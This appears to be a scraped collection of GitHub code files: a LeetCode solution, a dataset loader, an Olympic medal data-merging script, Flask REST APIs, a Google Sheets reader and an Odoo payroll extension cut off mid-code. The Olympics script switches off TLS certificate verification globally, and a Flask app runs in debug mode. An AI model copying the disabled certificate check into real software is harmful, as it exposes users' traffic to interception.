\n","repo_name":"drinkingcoder/FlowFormer-Official","sub_path":"core/utils/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":19642,"program_lang":"python","lang":"en","doc_type":"code","stars":343,"dataset":"github-code","pt":"34"} +{"seq_id":"8803475022","text":"from typing import List\n\n\nclass Solution:\n def wiggleMaxLength(self, nums: List[int]) -> int:\n up, down = 1, 1\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1]:\n up = down + 1\n if nums[i] < nums[i - 1]:\n down = up + 1\n return 0 if 0 == len(nums) else max(up, down)\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n result = solution.wiggleMaxLength(nums=[1, 7, 4, 9, 2, 5])\n print(result)\n","repo_name":"chinesezyc/leetcode","sub_path":"动态规划/376. 摆动序列.py","file_name":"376. 
摆动序列.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"32172693961","text":"import numpy as np\nfrom numpy import ndarray\nfrom pathlib import Path\nfrom torch.utils.data import Dataset\nfrom typing import Any, Callable, Tuple\nfrom urllib import request\n\n\nclass Dsprites(Dataset):\n URL = (\n \"https://github.com/deepmind/dsprites-dataset/raw/master/\"\n \"dsprites_ndarray_co1sh3sc6or40x32y32_64x64.npz\"\n )\n\n def __init__(\n self,\n file_name: str = \"/tmp/dsprites.npz\",\n transform: Callable[[ndarray], Any] = lambda x: x,\n ) -> None:\n path = Path(file_name)\n assert path.suffix == \".npz\", \"Dsprites file name muse be end with .npz\"\n if not path.exists():\n self._download(path)\n self.rawdata = np.load(file_name)\n self.path = path\n self.images = list(map(transform, self.rawdata[\"imgs\"]))\n self.latent_values = self.rawdata[\"latents_values\"]\n self.latent_classes = self.rawdata[\"latents_classes\"]\n\n def __getitem__(self, i) -> Tuple[Any, Tuple[ndarray, ndarray]]:\n return self.images[i], (self.latent_values[i], self.latent_classes[i])\n\n def __len__(self) -> int:\n return len(self.images)\n\n def __repr__(self) -> str:\n return \"Dsprites dataset in{}\".format(self.path)\n\n def _download(self, path: Path) -> None:\n req = request.Request(self.URL)\n print(\"Downloading dsprites_ndarray_*.npz...\")\n with request.urlopen(req) as res:\n path.write_bytes(res.read())\n","repo_name":"kngwyu/pytorch-autoencoders","sub_path":"pytorch_autoencoders/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"44468180974","text":"from numpy import dtype, inf\r\nimport pandas as pd\r\nimport ssl\r\nssl._create_default_https_context = ssl._create_unverified_context # Tää korjaa sen SSL: CERTIFICATE_VERIFY_FAILED jos yrittää lukea dataa URL:stä\r\npd.set_option(\"display.precision\", 2)\r\n\r\ndf = pd.read_csv('https://query.data.world/s/cvvxnd5qafkvb64qq7jw44o6y2zcpr') # Data olympialaisista 1896-2018\r\nTokio2020Data = pd.read_csv('Tokio2020.csv', encoding='latin-1') # Data vuoden 2020 olympialaisista (Lukee täl hetkel tuolta tiedostosta)\r\nHostData = pd.read_csv('HostCities.csv', encoding='latin-1') # Data olympia isäntä valtioista\r\nCodeData = pd.read_csv('https://raw.githubusercontent.com/datasets/country-codes/master/data/country-codes.csv') # Täältä haetaan ne ISO3166-1 koodit kartaa varten\r\nRecordsM = pd.read_csv('RecordsMen.csv', encoding='latin-1') # Data nykyisistä miesten olympiaennätyksistä\r\nRecordsW = pd.read_csv('RecordsWomen.csv', encoding='latin-1') # Data nykyisistä naisten olympiaennätyksistä\r\nFlags = pd.read_csv('Flags.csv', encoding='latin-1')\r\nMedalsBySport = pd.read_csv('MedalsBySport.csv', encoding='latin-1')\r\n\r\n# Annetaan jokaiselle valtiolle ISO3166-1 koodi d3-karttaa varten\r\ndf.set_index('Code', inplace = True)\r\nHostData.set_index('Code', inplace = True)\r\nCodeData.set_index('IOC', inplace = True)\r\nRecordsM.set_index('NOC', inplace = True)\r\nRecordsW.set_index('NOC', inplace = True)\r\nMedalsBySport.set_index('NOC', inplace = True)\r\nFlags.set_index('NOC', inplace = True)\r\nFlags = Flags[~Flags.index.duplicated()]\r\nCodeData = CodeData[~CodeData.index.duplicated()]\r\ndf['id'] = CodeData['ISO3166-1-Alpha-3']\r\n\r\n# Koska Venäjä oli ROC eikä RUS vuonna 
# Because Russia competed as ROC instead of RUS in 2020\r\nTokio2020Data.loc[Tokio2020Data['Team/NOC']=='ROC', 'NOCCode'] = 'RUS' \r\nTokio2020Data.set_index('NOCCode', inplace = True)\r\n\r\n# Rename a few things\r\ndf.rename(columns = {'Medal.1':'Medals (Total)', 'Apps':'Appearances (Total)', \r\n                     'SO_Apps':'Appearances (Summer)', 'WO_Apps':'Appearances (Winter)',\r\n                     'SO_Medal':'Medals (Summer)', 'WO_Medal':'Medals (Winter)',\r\n                     '':''}, inplace = True)\r\n\r\ndf.loc[df['Nation']=='Germany, East', 'Nation'] = 'East Germany'\r\ndf.loc[df['Nation']=='Germany, West', 'Nation'] = 'West Germany'\r\ndf.loc[df['Nation']=='Germany, United Team of', 'Nation'] = 'United Team of Germany'\r\ndf.loc[df['Nation']=='China, Republic of', 'Nation'] = 'Republic of China'\r\ndf.loc[df['Nation']=='Micronesia, Federated States of', 'Nation'] = 'Federated States of Micronesia'\r\ndf.loc[df['Nation']=='Yemen, North', 'Nation'] = 'North Yemen'\r\ndf.loc[df['Nation']=='Yemen, South', 'Nation'] = 'South Yemen'\r\n\r\n# Add the 2020 medals to the all-time totals of the other years\r\n# Countries that did not attend the 2020 Olympics get NaN; this turns those into zero (0)\r\ndf['Tokio'] = Tokio2020Data['Total']\r\ndf['Tokio'] = df['Tokio'].fillna(0)\r\ndf['Medals (Total)'] += df['Tokio']\r\ndf['Medals (Summer)'] += df['Tokio'] \r\n\r\ndf['Tokio'] = Tokio2020Data['Gold'] \r\ndf['Tokio'] = df['Tokio'].fillna(0) \r\ndf['Gold'] += df['Tokio'] \r\ndf['SO_Gold'] += df['Tokio'] \r\n\r\ndf['Tokio'] = Tokio2020Data['Silver'] \r\ndf['Tokio'] = df['Tokio'].fillna(0) \r\ndf['Silver'] += df['Tokio'] \r\ndf['SO_Silver'] += df['Tokio'] \r\n\r\ndf['Tokio'] = Tokio2020Data['Bronze'] \r\ndf['Tokio'] = df['Tokio'].fillna(0) \r\ndf['Bronze'] += df['Tokio'] \r\ndf['SO_Bronze'] += df['Tokio'] \r\n \r\n# Add the hosting info\r\ndf['Hosts (Total)'] = HostData['HostTotal']\r\ndf['Hosts (Total)'] = df['Hosts (Total)'].fillna(0)\r\ndf['Hosts (Summer)'] = HostData['HostSummer']\r\ndf['Hosts (Summer)'] = df['Hosts (Summer)'].fillna(0)\r\ndf['Hosts (Winter)'] = HostData['HostWinter']\r\ndf['Hosts (Winter)'] = df['Hosts (Winter)'].fillna(0)\r\ndf['HostInfo'] = HostData['Info']\r\n\r\n# Records\r\ndf['RecordsM'] = RecordsM['Record']\r\ndf['RecordsW'] = RecordsW['Record']\r\n\r\n# Flags\r\ndf['Flag'] = Flags['Flag']\r\n\r\n# Medal count relative to population\r\ndf.loc[df['Medals (Total)'] > 0, 'Medals (Per capita)'] = df['Medals (Total)'] / df['Population'] * 1000000 \r\ndf['Medals (Per capita)'] = df['Medals (Per capita)'].fillna(0) # This is for the countries with no medals at all; otherwise they would get inf\r\ndf.loc[df['Medals (Per capita)'] == inf, 'Medals (Per capita)'] = 0\r\n\r\n# A bit of type conversion\r\ndf = df.astype({'Medals (Total)': int, 'Gold': int, 'Silver': int, 'Bronze': int, # Make these integers so no decimals show up\r\n                'Medals (Summer)': int, 'SO_Gold': int, 'SO_Silver': int, 'SO_Bronze': int,\r\n                'Hosts (Total)': int, 'Hosts (Summer)': int, 'Hosts (Winter)': int})\r\n\r\n# Remove unnecessary columns\r\ndf = df.drop(df.columns[[22, 23, 24, 25, 26, 33]], axis=1)\r\n\r\n
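# [editor's note] An equivalent vectorised form of the per-sport loop below, as a\r\n# sketch (not in the original): MedalsBySport and df share the NOC-code index, so\r\n#   df[lajit] = MedalsBySport[lajit].reindex(df.index).fillna(0).astype(int)\r\n# would fill all of the sport columns in one statement\r\n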
\"Korea\": \"XKR\",\r\n \"Kosovo\": \"XKO\",\r\n \"Malaya\": \"XML\",\r\n \"Marshall Islands\": \"XMI\",\r\n \"Montenegro\": \"MNE\",\r\n \"North Borneo\": \"XNB\",\r\n \"Russian Empire\": \"XRE\",\r\n \"Saar\": \"XSA\",\r\n \"Serbia and Montenegro\": \"XSM\",\r\n \"Singapore\": \"SGP\",\r\n \"Soviet Union\": \"XSU\",\r\n \"Sudan, South\": \"SSD\",\r\n \"Unified Team\": \"XUT\",\r\n \"North Yemen\": \"XNY\",\r\n \"South Yemen\": \"XSY\",\r\n \"Yugoslavia\": \"XYS\"\r\n}\r\nfor ryhma_avain in koodittomat:\r\n df.loc[df['Nation']==ryhma_avain, 'id'] = koodittomat[ryhma_avain]\r\n \r\ndf['iidee'] = df['id']\r\n\r\ndf.set_index('iidee', inplace = True)\r\n\r\n# Tehdään dataframesta csv-tiedosto\r\ndf.to_csv('datacsv.csv', index=False, float_format='%.2f')\r\ndf.to_json('tietorakenne.json', orient='index')","repo_name":"OlliMehtonen/Olympiaprojekti","sub_path":"Debug/Data/CSVLukija.py","file_name":"CSVLukija.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23074866523","text":"import json\nimport click\nfrom jsonschema import validate, ValidationError\nfrom flask import Flask, Response, request, url_for\nfrom flask.cli import with_appcontext\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_restful import Resource, Api\nfrom sqlalchemy.exc import IntegrityError, StatementError\nfrom werkzeug.exceptions import NotFound\nfrom werkzeug.routing import BaseConverter\n\napp = Flask(__name__)\napp.config[\"SERVER_NAME\"] = \"127.0.0.1:8000\"\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///test.db\"\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\ndb = SQLAlchemy(app)\n\napi = Api(app)\n\nMASON = \"application/vnd.mason+json\"\nERROR_PROFILE = \"/profiles/error/\"\nLINK_RELATIONS_URL = \"/storage/link-relations/\"\nPRODUCT_PROFILE = \"/profiles/product/\"\n\n\nclass Product(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n handle = db.Column(db.String(64), unique=True, nullable=False)\n price = db.Column(db.Float, nullable=False)\n weight = db.Column(db.Float, nullable=False)\n\n storage = db.relationship(\"StorageItem\", back_populates=\"product\")\n\n @staticmethod\n def json_schema():\n schema = {\n \"type\": \"object\",\n \"properties\": {},\n \"required\": [\"handle\", \"price\", \"weight\"]\n }\n props = schema[\"properties\"]\n props[\"handle\"] = {\n \"description\": \"Products unique handle\",\n \"type\": \"string\"\n }\n props[\"price\"] = {\n \"description\": \"Products price\",\n \"type\": \"number\"\n }\n props[\"weight\"] = {\n \"description\": \"Products weight\",\n \"type\": \"number\"\n }\n return schema\n\n\nclass StorageItem(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n qty = db.Column(db.Integer, nullable=False)\n product_id = db.Column(db.Integer, db.ForeignKey(\n \"product.id\"), nullable=False)\n location = db.Column(db.String(64), nullable=False)\n\n product = db.relationship(\"Product\", back_populates=\"storage\")\n\n\nclass ProductConverter(BaseConverter):\n\n def to_python(self, product_name):\n db_product = Product.query.filter_by(handle=product_name).first()\n if db_product is None:\n raise NotFound\n return db_product\n\n def to_url(self, db_product):\n return db_product.handle\n\n\nclass MasonBuilder(dict):\n \"\"\"\n A convenience class for managing dictionaries that represent Mason\n objects. 
class MasonBuilder(dict):\n    \"\"\"\n    A convenience class for managing dictionaries that represent Mason\n    objects. It provides nice shorthands for inserting some of the more common\n    elements into the object but mostly is just a parent for the much more\n    useful subclass defined next. This class is generic in the sense that it\n    does not contain any application specific implementation details.\n\n    Note that child classes should set the *DELETE_RELATION* to the application\n    specific relation name from the application namespace. The IANA standard\n    does not define a link relation for deleting something.\n    \"\"\"\n\n    DELETE_RELATION = \"\"\n\n    def add_control(self, ctrl_name, href, **kwargs):\n        \"\"\"\n        Adds a control property to an object. Also adds the @controls property\n        if it doesn't exist on the object yet. Technically only certain\n        properties are allowed for kwargs but again we're being lazy and don't\n        perform any checking.\n        The allowed properties can be found from here\n        https://github.com/JornWildt/Mason/blob/master/Documentation/Mason-draft-2.md\n        : param str ctrl_name: name of the control (including namespace if any)\n        : param str href: target URI for the control\n        \"\"\"\n\n        if \"@controls\" not in self:\n            self[\"@controls\"] = {}\n\n        self[\"@controls\"][ctrl_name] = kwargs\n        self[\"@controls\"][ctrl_name][\"href\"] = href\n\n    def add_control_post(self, ctrl_name, title, href, schema):\n        \"\"\"\n        Utility method for adding POST type controls. The control is\n        constructed from the method's parameters. Method and encoding are\n        fixed to \"POST\" and \"json\" respectively.\n\n        : param str ctrl_name: name of the control (including namespace if any)\n        : param str href: target URI for the control\n        : param str title: human-readable title for the control\n        : param dict schema: a dictionary representing a valid JSON schema\n        \"\"\"\n\n        self.add_control(\n            ctrl_name,\n            href,\n            method=\"POST\",\n            encoding=\"json\",\n            title=title,\n            schema=schema\n        )\n\n    def add_control_put(self, title, href, schema):\n        \"\"\"\n        Utility method for adding PUT type controls. The control is\n        constructed from the method's parameters. Control name, method and\n        encoding are fixed to \"edit\", \"PUT\" and \"json\" respectively.\n\n        : param str href: target URI for the control\n        : param str title: human-readable title for the control\n        : param dict schema: a dictionary representing a valid JSON schema\n        \"\"\"\n\n        self.add_control(\n            \"edit\",\n            href,\n            method=\"PUT\",\n            encoding=\"json\",\n            title=title,\n            schema=schema\n        )\n\n    def add_control_delete(self, title, href):\n        \"\"\"\n        Utility method for adding DELETE type controls. The control is\n        constructed from the method's parameters. Control method is fixed to\n        \"DELETE\", and control's name is read from the class attribute\n        *DELETE_RELATION* which needs to be overridden by the child class.\n\n        : param str href: target URI for the control\n        : param str title: human-readable title for the control\n        \"\"\"\n\n        self.add_control(\n            \"mumeta:delete\",  # note: hardcoded here instead of self.DELETE_RELATION as the docstring suggests\n            href,\n            method=\"DELETE\",\n            title=title,\n        )\n\n    def add_namespace(self, ns, uri):\n        \"\"\"\n        Adds a namespace element to the object. A namespace defines where our\n        link relations are coming from. 
The URI can be an address where\n developers can find information about our link relations.\n : param str ns: the namespace prefix\n : param str uri: the identifier URI of the namespace\n \"\"\"\n\n if \"@namespaces\" not in self:\n self[\"@namespaces\"] = {}\n\n self[\"@namespaces\"][ns] = {\n \"name\": uri\n }\n\n\nclass InventoryBuilder(MasonBuilder):\n\n def add_control_all_products(self):\n self.add_control(\n \"storage:products-all\",\n api.url_for(ProductCollection),\n title=\"All products\",\n method=\"GET\"\n )\n\n def add_control_delete_product(self, handle):\n self.add_control(\n \"storage:delete\",\n api.url_for(ProductItem, product=handle),\n method=\"DELETE\"\n )\n\n def add_control_add_product(self):\n self.add_control_post(\n \"storage:add-product\",\n \"Add a new product\",\n api.url_for(ProductCollection),\n Product.json_schema()\n )\n\n def add_control_edit_product(self, handle):\n self.add_control_put(\n \"edit\",\n api.url_for(ProductItem, product=handle),\n Product.json_schema(),\n )\n\n\n@click.command(\"init-db\")\n@with_appcontext\ndef init_db_command():\n \"\"\"\n Initializes the database. If already initialized, nothing happens.\n \"\"\"\n\n db.create_all()\n\n\n@click.command(\"populate-db\")\n@with_appcontext\ndef populate_db_command():\n \"\"\"\n Populates the database with products\n \"\"\"\n\n for i in range(1, 4):\n p = Product(\n handle=\"test-product-{}\".format(i),\n price=10.5 * i,\n weight=2.1 * i\n )\n db.session.add(p)\n db.session.commit()\n\n\n@app.route(\"/api/\")\ndef api_entry_point():\n body = InventoryBuilder()\n body.add_namespace(\"storage\", LINK_RELATIONS_URL)\n body.add_control_all_products()\n return Response(json.dumps(body), 200, mimetype=MASON)\n\n\n@app.route(\"/\")\ndef index():\n return \"How to1:\"\n\n\n@app.route(\"/products/link-relations/\")\ndef link_relations():\n return \"here be link relations\"\n\n\n@app.route(\"/profiles/product/\")\ndef profiles():\n return \"How to3:\"\n\n\n@app.route(\"/profiles/error-profile/\")\ndef profiles_error():\n return \"error-profile\"\n\n\nclass ProductCollection(Resource):\n\n def get(self):\n\n body = InventoryBuilder(items=[])\n body.add_namespace(\"storage\", LINK_RELATIONS_URL)\n body.add_control(\"self\", href=api.url_for(ProductCollection))\n body.add_control_add_product()\n\n for product in Product.query.all():\n item = {\n \"handle\": product.handle,\n \"weight\": product.weight,\n \"price\": product.price,\n\n }\n item[\"@controls\"] = {\n \"self\": {\"href\": api.url_for(ProductItem, product=product)},\n \"profile\": {\"href\": PRODUCT_PROFILE}\n }\n body[\"items\"].append(item)\n return Response(json.dumps(body), 200, mimetype=MASON)\n\n def post(self):\n try:\n data = request.json\n handle = data[\"handle\"]\n weight = float(data[\"weight\"])\n price = float(data[\"price\"])\n product = Product(\n handle=handle,\n weight=weight,\n price=price\n )\n db.session.add(product)\n db.session.commit()\n except KeyError:\n return \"Incomplete request - missing fields\", 400\n except TypeError:\n return \"Request content type must be JSON\", 415\n except ValueError:\n return \"Weight and price must be numbers\", 400\n except IntegrityError:\n return \"Handle already exists\", 409\n except StatementError:\n return \"\", 500\n return Response(status=201, headers={\"Location\": api.url_for(ProductItem, product=product)})\n\n\nclass ProductItem(Resource):\n\n def get(self, product):\n product_information = {\n \"handle\": product.handle,\n \"weight\": product.weight,\n \"price\": 
product.price\n        }\n        body = InventoryBuilder(product_information)\n        body.add_namespace(\"storage\", LINK_RELATIONS_URL)\n        body.add_control(\"self\", href=api.url_for(\n            ProductItem, product=product))\n        body.add_control(\"profile\", href=PRODUCT_PROFILE)\n        body.add_control(\"collection\", href=api.url_for(ProductCollection))\n        body.add_control_edit_product(product)\n        body.add_control_delete_product(product)\n        return Response(json.dumps(body), 200, mimetype=MASON)\n\n    def put(self, product):\n        if not request.json:\n            return \"Unsupported media type - Requests must be JSON\", 415\n\n        try:\n            validate(request.json, Product.json_schema())\n        except ValidationError as e:\n            return f\"Invalid JSON document: {e}\", 400\n\n        product.handle = request.json[\"handle\"]\n        product.price = float(request.json[\"price\"])\n        product.weight = float(request.json[\"weight\"])\n\n        try:\n            db.session.commit()\n        except IntegrityError:\n            return f\"Product with handle '{product.handle}' already exists.\", 409\n\n        return Response(status=204)\n\n    def delete(self, product):\n        db.session.delete(product)\n        db.session.commit()\n\n        return Response(status=204)\n\n\n@click.command(\"test-document\")\n@with_appcontext\ndef test_document_command():\n    with app.app_context():\n        product = Product.query.first()\n        document = InventoryBuilder()\n        document.add_control_all_products()\n        document.add_control_add_product()\n        document.add_control_delete_product(product)\n        document.add_control_edit_product(product)\n        document[\"@controls\"][\"collection\"]\n        # print(document[\"items\"][0][\"@controls\"][\"self\"])\n\n\napp.url_map.converters[\"product\"] = ProductConverter\napi.add_resource(ProductCollection, \"/api/products/\")\napi.add_resource(ProductItem, \"/api/products/<product:product>/\")\napp.cli.add_command(init_db_command)\napp.cli.add_command(populate_db_command)\napp.cli.add_command(test_document_command)\n\nprint(\"Starting SensorHub flask app...\\n\\n\")\napp.run(debug=True)\n","repo_name":"lsuutari19/pwp-exercises","sub_path":"exc3/inventory/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":12186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12353648252","text":"from updategoogle import getdatafromgooglesheet\r\nimport pandas as pd\r\nfrom datetime import datetime\r\n\r\nspreadsheet_url = '1ejYQsDucZN1mDbwGNE1YW2oUE1S9xsbwiUsGr3zXsCk'\r\nsheet = 'SO'\r\n\r\na = getdatafromgooglesheet(spreadsheets_url=spreadsheet_url, sheet=sheet, range='C1:I')\r\nso = pd.DataFrame(data=a.iloc[1:,:].values,columns=a.iloc[0,:])\r\nso.columns = ['customer','so','mnf','po','item','qty','confirm_etd']\r\nso['row_number'] = so['po'].index+2\r\nso= so[~so['po'].isna()]\r\nso['qty'] = so['qty'].apply(lambda x: int(x.replace(',','')))\r\n \r\nso['confirm_etd'] = so['confirm_etd'].apply(lambda x: datetime.strptime(x,'%m/%d/%Y'))\r\n# print(so['confirm_etd'])\r\nif __name__ == '__main__':\r\n    print(so['row_number'])\r\n    print(so.dtypes)\r\n    import os\r\n    so.to_excel('so.xlsx')\r\n    os.system('so.xlsx')","repo_name":"phananfn/pl","sub_path":"getdatafromSO.py","file_name":"getdatafromSO.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9502683907","text":"from http import HTTPStatus\n\nfrom flask import request\nfrom flask_cors import cross_origin\nfrom flask_restx import Namespace, Resource\nfrom marshmallow import ValidationError\n\nfrom met_api.auth import auth\nfrom met_api.auth import jwt 
as _jwt\nfrom met_api.schemas.engagement_metadata import EngagementMetadataSchema\nfrom met_api.services.engagement_metadata_service import EngagementMetadataService\nfrom met_api.utils.token_info import TokenInfo\nfrom met_api.utils.util import allowedorigins, cors_preflight\n\n\nAPI = Namespace('engagementsmetadata', description='Endpoints for Engagement Metadata Management')\n\"\"\"Custom exception messages\n\"\"\"\n\n\n@cors_preflight('GET,OPTIONS')\n@API.route('/<engagement_id>')\nclass EngagementMetadata(Resource):\n    \"\"\"Resource for managing a single engagement.\"\"\"\n\n    @staticmethod\n    @cross_origin(origins=allowedorigins())\n    @auth.optional\n    def get(engagement_id):\n        \"\"\"Fetch a single engagement metadata matching the provided id.\"\"\"\n        try:\n            metadata_record = EngagementMetadataService().get_metadata(engagement_id)\n            return metadata_record, HTTPStatus.OK\n        except KeyError:\n            return 'Engagement metadata was not found', HTTPStatus.INTERNAL_SERVER_ERROR\n        except ValueError as err:\n            return str(err), HTTPStatus.INTERNAL_SERVER_ERROR\n\n\n@cors_preflight('POST, PATCH, OPTIONS')\n@API.route('/')\nclass EngagementsMetadata(Resource):\n    \"\"\"Resource for managing engagements metadata.\"\"\"\n\n    @staticmethod\n    @cross_origin(origins=allowedorigins())\n    @_jwt.requires_auth\n    def post():\n        \"\"\"Create a new engagement metadata.\"\"\"\n        try:\n            requestjson = request.get_json()\n            metadata_schema = EngagementMetadataSchema()\n            metadata_model = EngagementMetadataService().create_metadata(requestjson)\n            return metadata_schema.dump(metadata_model), HTTPStatus.OK\n        except KeyError as err:\n            return str(err), HTTPStatus.INTERNAL_SERVER_ERROR\n        except ValueError as err:\n            return str(err), HTTPStatus.INTERNAL_SERVER_ERROR\n        except ValidationError as err:\n            return str(err.messages), HTTPStatus.INTERNAL_SERVER_ERROR\n\n    @staticmethod\n    @cross_origin(origins=allowedorigins())\n    @_jwt.requires_auth\n    def patch():\n        \"\"\"Update saved engagement metadata partially.\"\"\"\n        try:\n            requestjson = request.get_json()\n            user_id = TokenInfo.get_id()\n            requestjson['updated_by'] = user_id\n\n            metadata_schema = EngagementMetadataSchema()\n            metadata_schema.load(requestjson, partial=True)\n            metadata = EngagementMetadataService().update_metadata(requestjson)\n\n            return metadata_schema.dump(metadata), HTTPStatus.OK\n        except KeyError as err:\n            return str(err), HTTPStatus.INTERNAL_SERVER_ERROR\n        except ValueError as err:\n            return str(err), HTTPStatus.INTERNAL_SERVER_ERROR\n        except ValidationError as err:\n            return str(err.messages), HTTPStatus.INTERNAL_SERVER_ERROR\n","repo_name":"bcgov/met-public","sub_path":"met-api/src/met_api/resources/engagement_metadata.py","file_name":"engagement_metadata.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"15036742890","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import fields, models, api, _\n\n\nclass HrPayslipInherit(models.Model):\n    _inherit = 'hr.payslip'\n\n    def _get_default_kpi_lines(self):\n        kpis = self.env['employee.kpi'].search([])\n        lines = []\n        if kpis:\n            for kpi in kpis:\n                lines.append((0, 0, {\n                    'employee_kpi_id': kpi.id,\n                    'apply': False,\n                }))\n        if lines:\n            return lines\n        return False\n\n\n    kpi_line_ids = fields.Many2many('employee.kpi.line', string=\"KPI's\", compute='_get_kpi_lines')\n\n    @api.depends('date_from', 'date_to', 'employee_id')\n    def _get_kpi_lines(self):\n        for rec in self:\n            lines = []\n            for kh in self.env['employee.kpi.history'].search([('state', '=', 
'confirmed'), ('date', '>=', rec.date_from), ('date', '<=', rec.date_to)], limit=1):\n for line in kh.kpi_line_ids:\n if line.apply:\n lines.append(line.id)\n rec.kpi_line_ids = [(6, 0, lines)]\n\n\n @api.model\n def _get_payslip_lines(self, contract_ids, payslip_id):\n res = super(HrPayslipInherit, self)._get_payslip_lines(contract_ids, payslip_id)\n\n rule_ids = []\n payslip = self.env['hr.payslip'].browse(payslip_id)\n for line in payslip.kpi_line_ids:\n if line.apply:\n rule_ids.append(line.employee_kpi_id.salary_rule_id.id)\n\n def _sum_salary_rule_category(localdict, category, amount):\n if category.parent_id:\n localdict = _sum_salary_rule_category(localdict, category.parent_id, amount)\n localdict['categories'].dict[category.code] = category.code in localdict['categories'].dict and localdict['categories'].dict[category.code] + amount or amount\n return localdict\n\n class BrowsableObject(object):\n def __init__(self, employee_id, dict, env):\n self.employee_id = employee_id\n self.dict = dict\n self.env = env\n\n def __getattr__(self, attr):\n return attr in self.dict and self.dict.__getitem__(attr) or 0.0\n\n class InputLine(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(amount) as sum\n FROM hr_payslip as hp, hr_payslip_input as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()[0] or 0.0\n\n class WorkedDays(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n def _sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(number_of_days) as number_of_days, sum(number_of_hours) as number_of_hours\n FROM hr_payslip as hp, hr_payslip_worked_days as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()\n\n def sum(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[0] or 0.0\n\n def sum_hours(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[1] or 0.0\n\n class Payslips(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"SELECT sum(case when hp.credit_note = False then (pl.total) else (-pl.total) end)\n FROM hr_payslip as hp, hr_payslip_line as pl\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pl.slip_id AND pl.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n res = self.env.cr.fetchone()\n return res and res[0] or 0.0\n\n #we keep a dict with the result because a value can be overwritten by another rule with the same code\n result_dict = {}\n rules_dict = {}\n worked_days_dict = {}\n inputs_dict = {}\n blacklist = []\n payslip = self.env['hr.payslip'].browse(payslip_id)\n for worked_days_line in payslip.worked_days_line_ids:\n 
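# index each worked-days line by its code; the salary-rule expressions evaluated\n            # below can then read them as worked_days.<CODE> through BrowsableObject.__getattr__\n            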
worked_days_dict[worked_days_line.code] = worked_days_line\n for input_line in payslip.input_line_ids:\n inputs_dict[input_line.code] = input_line\n\n categories = BrowsableObject(payslip.employee_id.id, {}, self.env)\n inputs = InputLine(payslip.employee_id.id, inputs_dict, self.env)\n worked_days = WorkedDays(payslip.employee_id.id, worked_days_dict, self.env)\n payslips = Payslips(payslip.employee_id.id, payslip, self.env)\n rules = BrowsableObject(payslip.employee_id.id, rules_dict, self.env)\n\n baselocaldict = {'categories': categories, 'rules': rules, 'payslip': payslips, 'worked_days': worked_days, 'inputs': inputs}\n contracts = self.env['hr.contract'].browse(contract_ids)\n sorted_rules = self.env['hr.salary.rule'].browse(rule_ids)\n for contract in contracts:\n employee = contract.employee_id\n localdict = dict(baselocaldict, employee=employee, contract=contract)\n for rule in sorted_rules:\n key = rule.code + '-' + str(contract.id)\n localdict['result'] = None\n localdict['result_qty'] = 1.0\n localdict['result_rate'] = 100\n #check if the rule can be applied\n if rule._satisfy_condition(localdict) and rule.id not in blacklist:\n #compute the amount of the rule\n amount, qty, rate = rule._compute_rule(localdict)\n #check if there is already a rule computed with that code\n previous_amount = rule.code in localdict and localdict[rule.code] or 0.0\n #set/overwrite the amount computed for this rule in the localdict\n tot_rule = amount * qty * rate / 100.0\n localdict[rule.code] = tot_rule\n rules_dict[rule.code] = rule\n #sum the amount for its salary category\n localdict = _sum_salary_rule_category(localdict, rule.category_id, tot_rule - previous_amount)\n #create/overwrite the rule in the temporary results\n result_dict[key] = {\n 'salary_rule_id': rule.id,\n 'contract_id': contract.id,\n 'name': rule.name,\n 'code': rule.code,\n 'category_id': rule.category_id.id,\n 'sequence': rule.sequence,\n 'appears_on_payslip': rule.appears_on_payslip,\n 'condition_select': rule.condition_select,\n 'condition_python': rule.condition_python,\n 'condition_range': rule.condition_range,\n 'condition_range_min': rule.condition_range_min,\n 'condition_range_max': rule.condition_range_max,\n 'amount_select': rule.amount_select,\n 'amount_fix': 